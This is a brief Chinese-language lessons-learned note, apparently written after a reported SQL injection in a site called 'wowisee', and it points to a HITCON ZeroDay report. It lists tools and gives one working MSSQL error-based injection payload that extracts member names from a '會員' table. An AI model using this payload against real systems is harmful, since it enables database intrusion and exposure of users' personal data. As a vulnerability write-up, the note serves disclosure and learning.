SQL Injection wowisee Success

本文是 https://zeroday.hitcon.org/vulnerability/ZD-2025-01030 的延伸

學到的東西

1. 編碼轉換，可使用 Hex to String Converter Online
2. MSSQL 引出 SQLi Error Message 的方法

' AND 1 = CONVERT(int,(SELECT TOP 10 姓名 + '|' FROM 會員 FOR XML PATH('')))--123

3. 需要看 HTTP Response Hex 的時候，真的要用 Burp Suite 的 Repeater，超好用